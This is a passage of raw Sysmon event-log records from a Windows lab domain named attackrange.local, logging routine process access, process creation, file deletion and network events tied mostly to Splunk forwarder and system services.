09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979356Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979355Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979354Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979353Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979352Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979351Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979350Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979349Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8B73-6151-D779-00000000FD01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979348Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B73-6151-D779-00000000FD01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979347Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.072{69CF5F33-8B73-6151-D779-00000000FD01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:28.716{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF1E98AF67AC8D100B065C97BFC96CE9,SHA256=FCB9A8AC7E9FF98F37EFC0CA2121D864FEADF6ACE8D719C9203B6AD2EB3DE864,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979389Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B74-6151-D979-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979388Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979387Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979386Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979385Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979384Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979383Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979382Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979381Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979380Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979379Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.462{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8B74-6151-D979-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979378Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.447{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B74-6151-D979-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979377Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.447{69CF5F33-8B74-6151-D979-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000979376Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.250{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54405-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979375Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.056{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEAF660BE29D1829F1115AD4893B401E,SHA256=A555D6FD67DDA80CD8C3A342AF85F663FC77221A8957AB023F3E483D25753D4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979374Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.056{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7974482D698964643CB3E194364C30B,SHA256=EC3A9684B003525E98901E50FF44B8138739BB3A31ED6C5970C2A741B8F43851,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:26.378{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 